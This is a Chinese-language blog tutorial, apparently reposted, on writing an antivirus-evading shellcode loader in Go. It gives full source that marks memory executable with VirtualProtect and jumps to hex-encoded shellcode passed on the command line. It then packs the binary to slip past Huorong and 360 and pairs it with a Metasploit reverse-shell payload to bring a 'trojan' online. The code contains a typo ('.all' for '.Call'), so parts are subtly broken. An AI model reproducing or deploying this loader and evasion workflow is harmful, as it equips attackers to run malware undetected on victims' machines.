自写go加载器加壳免杀 |
您所在的位置:网站首页 › 免杀程序 › 自写go加载器加壳免杀 |
自写go加载器加壳免杀
|
本文作者:zedxx10师傅 01免杀编写说明 参考自己公司大佬写的go木马中的内存保护必须对Windows一些重要dll 和 go语言的指针有所了解(重 要 ! )思路:还是和我之前的文章一样采用分离式加载免杀02shellcode加载器 shellcode加载器的编写结构: 1. 定义一个接收函数 2. 将你的shellcode放入你的刚才定义的接收函数 3. 解密shellcode 4. 加载运行 03shellcode实现 讲 解 1. go语言编写的基本原则 go语言必要的 package main以及func main 主函数 package main func main(){ }基本的go结构:所有的函数都从main函数开始加载,如果没有放入函数,则不会执行该函数。 你创建的函数必须写在main函数之上  在主函数中加入Run函数(待会儿我们要创建的),并且该函数需要单独创建一个 这里只是调用:  2. 使用Run函数就得创建一个名为Run的函数,但是在那之前我们要使用一个保护函数待会用于保护我们的shellcode地址: 在这里可以创建VirtualProtect函数用来保护我们的函数,并且去掉一些函数特征。 具体代码如下: var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") //syscall是调用函数 通过call NewLazyDLL来调取kernel32.dll(及其重要的链接库 几乎所有的木马都会调用这个函数)NewProc是指api NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api //保护内存函数 去掉特征 func VirtualProtect(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) { //转换为同一类型的地址 uintptr,uint32 t, _, _ := procVirtualProtect.all( uintptr(a), uintptr(b), uintptr(c), uintptr(d)) fmt.Print(t) }这里我们需要了解几个重要的函数: syscall这是调用函数的函数; NewLazyDLL来调取kernel32.dll(极其重要的链接库 几乎所有的木马都会调用这个函数); NewProc是指api; NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api; 有兴趣的可以参考《恶意代码分析》这本书:  3. 将你保护代码放入你的定义函数之中 这里涉及go语言指针,简单的说一下指针,可能讲的会有些模糊。 指针是一个地址传递的,地址传递会发生内存地址的改变。 但是这个和值传递不同有所不同。 其中指针表示: *一级指针 **二级指针 func Run(sc []byte) { //定义函数 f := func() {} var old uint32 //一级指针的值为f的地址 //unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址 unsafe.Sizeof(uinpter(0))保护的参数为0 unint32(0x40)flNewProtect,内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行 VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old)) //将shellcode 放入函数中 &sc为shellcode的地址 **(**uintptr)(unsafe.Pointer(&f))就是将shellcode的地址赋值给了&f的地址 **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc)) var orgshellcode uint32 //shellcode地址 VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode)) f() //这里调用f函数 f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址 然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址 }在这里对下面的代码进行解读: VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old))解读: unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址 unsafe.Sizeof(uinpter(0))保护的参数设置为0 unint32(0x40)flNewProtect是内存新的属性类型,将PAGE_EXECUTE_READWRITE设置为(0x40)时该内存页为可读可写可执行并且是最大权限VirtualProtect 函数的意思:  继续: **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))将shellcode放入函数中,&sc为shellcode的内存地址;这里的目的就是将shellcode的地址赋值给了&f的地址。 通俗的讲就是: 以前shellcode的地址是&sc 现在变成&f ,而&f的地址是进行了内存保护的,等同于shellcode也被保护了。 shellcode的地址 VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode))4. 最后一步,调用f函数: 这里调用f函数 f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址 然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址04完整shellcode代码 完整代码如下: package main import ( "encoding/hex" "fmt" "os" "syscall" "unsafe" ) var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") //syscall是调用函数 通过call NewLazyDLL来调取kernel32.dll(及其重要的链接库 几乎所有的木马都会调用这个函数)NewProc是指api NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api //保护内存函数 去掉特征 func VirtualProtect(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) { //转换为同一类型的地址 uintptr,uint32 t, _, _ := procVirtualProtect.all( uintptr(a), uintptr(b), uintptr(c), uintptr(d)) fmt.Print(t) } func Run(sc []byte) { //定义函数 f := func() {} var old uint32 //一级指针的值为f的地址 //unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址 unsafe.Sizeof(uinpter(0))保护的参数为0 unint32(0x40)flNewProtect,内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行 VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old)) //将shellcode 放入函数中 &sc为shellcode的地址 **(**uintptr)(unsafe.Pointer(&f))就是将shellcode的地址赋值给了&f的地址 **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc)) var orgshellcode uint32 //shellcode地址 VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode)) f() //这里调用f函数 f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址 然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址 } func main() { //解密 x, _ := hex.DecodeString(os.Args[1]) Run(x) }其中:import是自动导入,不需要手动输入 以上完成了所有的代码,由于go语言无法直接执行,我们需要进行编译,编译方法如下: 找到你的go语言所在路径 cmd 使用 go build main.go 此时会编译生成一个main.exe (火绒会报毒 ) 05加 壳 免 杀 免杀还是采用加壳,upx可以使用但需要抹除特征码(对汇编不好的师傅不太友好,而且容易出问题)。 这里还是采用 safe的壳:  用法很简单: 将你的exe 拖入之后就可以了 (这里选择默认加壳模式就行了,当然如果懂汇编的师傅可以尝试一下其它的选项)  免杀效果:可过火绒和360。  06msf配合免杀演示 1. msf 生成木马  其中,LHOST、 LPORT 根据自己的情况设置。 2.查看生成的木马: cat rev.hex 3.创建监听  4.加载你的shellcode 找到你加壳后的exe,在 cmd中运行: main_se.exe + rev.hex的文件内容 此时木马上线成功  07 总 结 本次的内容,对于不懂汇编或者go语言的师傅会理解比较困难。我也尽力通俗的进行了描述, 如有不便请多担待,当然在这里生成的木马还是有点大,请师傅们理解。 08 tips 以上文章为zedxx10师傅所写,感谢zedxx10师傅的技术分享。 |
【本文地址】
今日新闻 |
推荐新闻 |